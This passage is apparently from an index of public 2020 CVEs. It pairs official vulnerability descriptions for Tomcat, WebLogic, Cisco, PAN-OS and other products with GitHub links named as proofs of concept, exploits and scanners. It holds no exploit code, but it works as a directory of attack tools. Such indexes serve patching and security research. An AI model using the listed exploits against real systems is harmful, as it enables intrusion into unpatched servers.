
- [shanika04/apache_kylin](https://github.com/shanika04/apache_kylin)

### CVE-2020-1938 (2020-02-24)

When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:

- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP

Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.

- [xindongzhuaizhuai/CVE-2020-1938](https://github.com/xindongzhuaizhuai/CVE-2020-1938)
- [sgdream/CVE-2020-1938](https://github.com/sgdream/CVE-2020-1938)
- [nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)
- [bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner](https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner)
- [laolisafe/CVE-2020-1938](https://github.com/laolisafe/CVE-2020-1938)
- [h7hac9/CVE-2020-1938](https://github.com/h7hac9/CVE-2020-1938)
- [sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read](https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read)
- [fairyming/CVE-2020-1938](https://github.com/fairyming/CVE-2020-1938)
- [dacade/CVE-2020-1938](https://github.com/dacade/CVE-2020-1938)
- [woaiqiukui/CVE-2020-1938TomcatAjpScanner](https://github.com/woaiqiukui/CVE-2020-1938TomcatAjpScanner)
- [fatal0/tomcat-cve-2020-1938-check](https://github.com/fatal0/tomcat-cve-2020-1938-check)
- [delsadan/CNVD-2020-10487-Bulk-verification](https://github.com/delsadan/CNVD-2020-10487-Bulk-verification)
- [00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487)
- [shaunmclernon/ghostcat-verification](https://github.com/shaunmclernon/ghostcat-verification)
- [w4fz5uck5/CVE-2020-1938-Clean-Version](https://github.com/w4fz5uck5/CVE-2020-1938-Clean-Version)
- [whatboxapp/GhostCat-LFI-exp](https://github.com/whatboxapp/GhostCat-LFI-exp)
- [Just1ceP4rtn3r/CVE-2020-1938-Tool](https://github.com/Just1ceP4rtn3r/CVE-2020-1938-Tool)
- [doggycheng/CNVD-2020-10487](https://github.com/doggycheng/CNVD-2020-10487)
- [I-Runtime-Error/CVE-2020-1938](https://github.com/I-Runtime-Error/CVE-2020-1938)
- [Umesh2807/Ghostcat](https://github.com/Umesh2807/Ghostcat)
- [MateoSec/ghostcatch](https://github.com/MateoSec/ghostcatch)
- [acodervic/CVE-2020-1938-MSF-MODULE](https://github.com/acodervic/CVE-2020-1938-MSF-MODULE)
- [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat)
- [streghstreek/CVE-2020-1938](https://github.com/streghstreek/CVE-2020-1938)
- [Neko-chanQwQ/CVE-2020-1938](https://github.com/Neko-chanQwQ/CVE-2020-1938)
- [jptr218/ghostcat](https://github.com/jptr218/ghostcat)
- [einzbernnn/CVE-2020-1938Scan](https://github.com/einzbernnn/CVE-2020-1938Scan)
- [YounesTasra-R4z3rSw0rd/CVE-2020-1938](https://github.com/YounesTasra-R4z3rSw0rd/CVE-2020-1938)
- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat)
- [Warelock/cve-2020-1938](https://github.com/Warelock/cve-2020-1938)
- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro)

### CVE-2020-1947 (2020-03-11)

In Apache ShardingSphere (incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows data to be unmarshalled to a Java type by using a YAML tag. Unmarshalling untrusted data can lead to RCE security flaws.

- [jas502n/CVE-2020-1947](https://github.com/jas502n/CVE-2020-1947)
- [wsfengfan/CVE-2020-1947](https://github.com/wsfengfan/CVE-2020-1947)
- [shadowsock5/ShardingSphere_CVE-2020-1947](https://github.com/shadowsock5/ShardingSphere_CVE-2020-1947)
- [StarkChristmas/CVE-2020-1947](https://github.com/StarkChristmas/CVE-2020-1947)

### CVE-2020-1948 (2020-07-14)

This vulnerability can affect all Dubbo users on version 2.7.6 or lower. An attacker can send RPC requests with an unrecognized service name or method name along with malicious parameter payloads. When the malicious parameter is deserialized, it executes malicious code. More details can be found below.

- [ctlyz123/CVE-2020-1948](https://github.com/ctlyz123/CVE-2020-1948)
- [txrw/Dubbo-CVE-2020-1948](https://github.com/txrw/Dubbo-CVE-2020-1948)
- [M3g4Byt3/cve-2020-1948-poc](https://github.com/M3g4Byt3/cve-2020-1948-poc)
- [L0kiii/Dubbo-deserialization](https://github.com/L0kiii/Dubbo-deserialization)

### CVE-2020-1956 (2020-05-22)

Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1, has some RESTful APIs which concatenate an OS command with the user input string, so a user is likely able to execute any OS command without any protection or validation.

- [b510/CVE-2020-1956](https://github.com/b510/CVE-2020-1956)

### CVE-2020-1958 (2020-04-01)

When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.

- [ggolawski/CVE-2020-1958](https://github.com/ggolawski/CVE-2020-1958)

### CVE-2020-1967 (2020-04-21)

Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f).

- [irsl/CVE-2020-1967](https://github.com/irsl/CVE-2020-1967)

### CVE-2020-1971 (2020-12-08)

The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).

- [MBHudson/CVE-2020-1971](https://github.com/MBHudson/CVE-2020-1971)

### CVE-2020-2023 (2020-06-10)

Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions.

- [ssst0n3/kata-cve-2020-2023-poc](https://github.com/ssst0n3/kata-cve-2020-2023-poc)

### CVE-2020-2034 (2020-07-08)

An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network-based attacker to execute arbitrary OS commands with root privileges. An attacker requires some knowledge of the firewall to exploit this issue. This issue cannot be exploited if the GlobalProtect portal feature is not enabled. This issue impacts PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; all versions of PAN-OS 8.0 and PAN-OS 7.1. Prisma Access services are not impacted by this vulnerability.

- [blackhatethicalhacking/CVE-2020-2034-POC](https://github.com/blackhatethicalhacking/CVE-2020-2034-POC)

### CVE-2020-2038 (2020-09-09)

An OS Command Injection vulnerability in the PAN-OS management interface allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.

- [und3sc0n0c1d0/CVE-2020-2038](https://github.com/und3sc0n0c1d0/CVE-2020-2038)

### CVE-2020-2333
- [section-c/CVE-2020-2333](https://github.com/section-c/CVE-2020-2333)

### CVE-2020-2501 (2021-02-17)

A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS); Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS).

- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)

### CVE-2020-2509 (2021-04-17)

A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS 4.5.2.1566 Build 20210202 and later; QTS 4.5.1.1495 Build 20201123 and later; QTS 4.3.6.1620 Build 20210322 and later; QTS 4.3.4.1632 Build 20210324 and later; QTS 4.3.3.1624 Build 20210416 and later; QTS 4.2.6 Build 20210327 and later; QuTS hero h4.5.1.1491 build 20201119 and later.

- [jbaines-r7/overkill](https://github.com/jbaines-r7/overkill)

### CVE-2020-2546 (2020-01-15)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Application Container - JavaEE). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [hktalent/CVE_2020_2546](https://github.com/hktalent/CVE_2020_2546)

### CVE-2020-2551 (2020-01-15)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [jas502n/CVE-2020-2551](https://github.com/jas502n/CVE-2020-2551)
- [hktalent/CVE-2020-2551](https://github.com/hktalent/CVE-2020-2551)
- [Y4er/CVE-2020-2551](https://github.com/Y4er/CVE-2020-2551)
- [zzwlpx/weblogicPoc](https://github.com/zzwlpx/weblogicPoc)
- [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://github.com/Dido1960/Weblogic-CVE-2020-2551-To-Internet)
- [DaMinGshidashi/CVE-2020-2551](https://github.com/DaMinGshidashi/CVE-2020-2551)
- [LTiDi2000/CVE-2020-2551](https://github.com/LTiDi2000/CVE-2020-2551)
- [0xAbbarhSF/CVE-Exploit](https://github.com/0xAbbarhSF/CVE-Exploit)

### CVE-2020-2555 (2020-01-15)

Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [Hu3sky/CVE-2020-2555](https://github.com/Hu3sky/CVE-2020-2555)
- [wsfengfan/CVE-2020-2555](https://github.com/wsfengfan/CVE-2020-2555)
- [Y4er/CVE-2020-2555](https://github.com/Y4er/CVE-2020-2555)
- [Maskhe/cve-2020-2555](https://github.com/Maskhe/cve-2020-2555)
- [Uvemode/CVE-2020-2555](https://github.com/Uvemode/CVE-2020-2555)
- [Qynklee/POC_CVE-2020-2555](https://github.com/Qynklee/POC_CVE-2020-2555)

### CVE-2020-2655 (2020-01-15)

Vulnerability in the Java SE product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).

- [RUB-NDS/CVE-2020-2655-DemoServer](https://github.com/RUB-NDS/CVE-2020-2655-DemoServer)

### CVE-2020-2733 (2020-04-15)

Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [anmolksachan/CVE-2020-2733](https://github.com/anmolksachan/CVE-2020-2733)

### CVE-2020-2883 (2020-04-15)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [Y4er/CVE-2020-2883](https://github.com/Y4er/CVE-2020-2883)
- [MagicZer0/Weblogic_CVE-2020-2883_POC](https://github.com/MagicZer0/Weblogic_CVE-2020-2883_POC)
- [ZZZWD/CVE-2020-2883](https://github.com/ZZZWD/CVE-2020-2883)
- [Y4er/WebLogic-Shiro-shell](https://github.com/Y4er/WebLogic-Shiro-shell)
- [FancyDoesSecurity/CVE-2020-2883](https://github.com/FancyDoesSecurity/CVE-2020-2883)
- [Al1ex/CVE-2020-2883](https://github.com/Al1ex/CVE-2020-2883)
- [Qynklee/POC_CVE-2020-2883](https://github.com/Qynklee/POC_CVE-2020-2883)

### CVE-2020-2950 (2020-04-15)

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [tuo4n8/CVE-2020-2950](https://github.com/tuo4n8/CVE-2020-2950)

### CVE-2020-2969 (2020-07-15)

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).

- [emad-almousa/CVE-2020-2969](https://github.com/emad-almousa/CVE-2020-2969)

### CVE-2020-2978 (2020-07-15)

Vulnerability in the Oracle Database - Enterprise Edition component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Oracle Database - Enterprise Edition. While the vulnerability is in Oracle Database - Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database - Enterprise Edition accessible data. CVSS 3.1 Base Score 4.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N).

- [emad-almousa/CVE-2020-2978](https://github.com/emad-almousa/CVE-2020-2978)

### CVE-2020-3153 (2020-02-19)

A vulnerability in the installer component of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated local attacker to copy user-supplied files to system level directories with system level privileges. The vulnerability is due to the incorrect handling of directory paths. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. An exploit could allow the attacker to copy malicious files to arbitrary locations with system level privileges. This could include DLL pre-loading, DLL hijacking, and other related attacks. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.

- [shubham0d/CVE-2020-3153](https://github.com/shubham0d/CVE-2020-3153)
- [raspberry-pie/CVE-2020-3153](https://github.com/raspberry-pie/CVE-2020-3153)
- [goichot/CVE-2020-3153](https://github.com/goichot/CVE-2020-3153)

### CVE-2020-3161 (2020-04-15)

A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.

- [abood05972/CVE-2020-3161](https://github.com/abood05972/CVE-2020-3161)

### CVE-2020-3187 (2020-05-06)

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.

- [CrackerCat/CVE-2020-3187](https://github.com/CrackerCat/CVE-2020-3187)
- [1337in/CVE-2020-3187](https://github.com/1337in/CVE-2020-3187)
- [sujaygr8/CVE-2020-3187](https://github.com/sujaygr8/CVE-2020-3187)
- [sunyyer/CVE-2020-3187-Scanlist](https://github.com/sunyyer/CVE-2020-3187-Scanlist)
- [Cappricio-Securities/CVE-2020-3187](https://github.com/Cappricio-Securities/CVE-2020-3187)

### CVE-2020-3433 (2020-08-17)

A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.

- [goichot/CVE-2020-3433](https://github.com/goichot/CVE-2020-3433)

### CVE-2020-3452 (2020-07-22)

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

- [XDev05/CVE-2020-3452-PoC](https://github.com/XDev05/CVE-2020-3452-PoC)
- [Loneyers/cve-2020-3452](https://github.com/Loneyers/cve-2020-3452)
- [PR3R00T/CVE-2020-3452-Cisco-Scanner](https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner)
- [mr-r3b00t/CVE-2020-3452](https://github.com/mr-r3b00t/CVE-2020-3452)
- [foulenzer/CVE-2020-3452](https://github.com/foulenzer/CVE-2020-3452)
- [Gh0st0ne/http-vuln-cve2020-3452.nse](https://github.com/Gh0st0ne/http-vuln-cve2020-3452.nse)
- [0x5ECF4ULT/CVE-2020-3452](https://github.com/0x5ECF4ULT/CVE-2020-3452)
- [paran0id34/CVE-2020-3452](https://github.com/paran0id34/CVE-2020-3452)
- [murataydemir/CVE-2020-3452](https://github.com/murataydemir/CVE-2020-3452)
- [ludy-dev/Cisco-ASA-LFI](https://github.com/ludy-dev/Cisco-ASA-LFI)
- [3ndG4me/CVE-2020-3452-Exploit](https://github.com/3ndG4me/CVE-2020-3452-Exploit)
- [grim3/CVE-2020-3452](https://github.com/grim3/CVE-2020-3452)
- [cygenta/CVE-2020-3452](https://github.com/cygenta/CVE-2020-3452)
- [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)
- [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://github.com/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal)
- [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://github.com/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner)
- [sujaygr8/CVE-2020-3452](https://github.com/sujaygr8/CVE-2020-3452)
- [Aviksaikat/CVE-2020-3452](https://github.com/Aviksaikat/CVE-2020-3452)
- [Veids/CVE-2020-3452_auto](https://github.com/Veids/CVE-2020-3452_auto)
- [iveresk/cve-2020-3452](https://github.com/iveresk/cve-2020-3452)
- [Cappricio-Securities/CVE-2020-3452](https://github.com/Cappricio-Securities/CVE-2020-3452)

### CVE-2020-3580 (2020-10-21)

Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.

- [Hudi233/CVE-2020-3580](https://github.com/Hudi233/CVE-2020-3580)
- [adarshvs/CVE-2020-3580](https://github.com/adarshvs/CVE-2020-3580)
- [cruxN3T/CVE-2020-3580](https://github.com/cruxN3T/CVE-2020-3580)
- [catatonicprime/CVE-2020-3580](https://github.com/catatonicprime/CVE-2020-3580)

### CVE-2020-3766 (2020-03-25)

Adobe Genuine Integrity Service versions Version 6.4 and earlier have an insecure file permissions vulnerability. Successful exploitation could lead to privilege escalation.

- [hessandrew/CVE-2020-3766_APSB20-12](https://github.com/hessandrew/CVE-2020-3766_APSB20-12)

### CVE-2020-3952 (2020-04-10)

Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.

- [chronoloper/CVE-2020-3952](https://github.com/chronoloper/CVE-2020-3952)
- [bb33bb/CVE-2020-3952](https://github.com/bb33bb/CVE-2020-3952)
- [guardicore/vmware_vcenter_cve_2020_3952](https://github.com/guardicore/vmware_vcenter_cve_2020_3952)
- [gelim/CVE-2020-3952](https://github.com/gelim/CVE-2020-3952)
- [Fa1c0n35/vmware_vcenter_cve_2020_3952](https://github.com/Fa1c0n35/vmware_vcenter_cve_2020_3952)

### CVE-2020-3956 (2020-05-20)

VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.

- [aaronsvk/CVE-2020-3956](https://github.com/aaronsvk/CVE-2020-3956)

### CVE-2020-3992 (2020-10-20)

OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.

- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992)
- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs)
- [vpxuser/VMware-ESXI-OpenSLP-Exploit](https://github.com/vpxuser/VMware-ESXI-OpenSLP-Exploit)

### CVE-2020-4040 (2020-06-08)

Bolt CMS before version 3.7.1 lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview. This has been fixed in Bolt 3.7.1.

- [jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041](https://github.com/jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041)

### CVE-2020-4276 (2020-03-26)

IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. X-Force ID: 175984.

- [mekoko/CVE-2020-4276](https://github.com/mekoko/CVE-2020-4276)

### CVE-2020-4463 (2020-07-29)

IBM Maximo Asset Management 7.6.0.1 and 7.6.0.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181484.

- [Ibonok/CVE-2020-4463](https://github.com/Ibonok/CVE-2020-4463)

### CVE-2020-4464 (2020-07-17)

IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to execute arbitrary code on a system with a specially-crafted sequence of serialized objects over the SOAP connector. IBM X-Force ID: 181489.

- [silentsignal/WebSphere-WSIF-gadget](https://github.com/silentsignal/WebSphere-WSIF-gadget)
- [yonggui-li/CVE-2020-4464-and-CVE-2020-4450](https://github.com/yonggui-li/CVE-2020-4464-and-CVE-2020-4450)

### CVE-2020-5014 (2021-03-08)

IBM DataPower Gateway V10 and V2018 could allow a local attacker with administrative privileges to execute arbitrary code on the system using a server-side request forgery attack. IBM X-Force ID: 193247.

- [copethomas/datapower-redis-rce-exploit](https://github.com/copethomas/datapower-redis-rce-exploit)

### CVE-2020-5236 (2020-02-04)

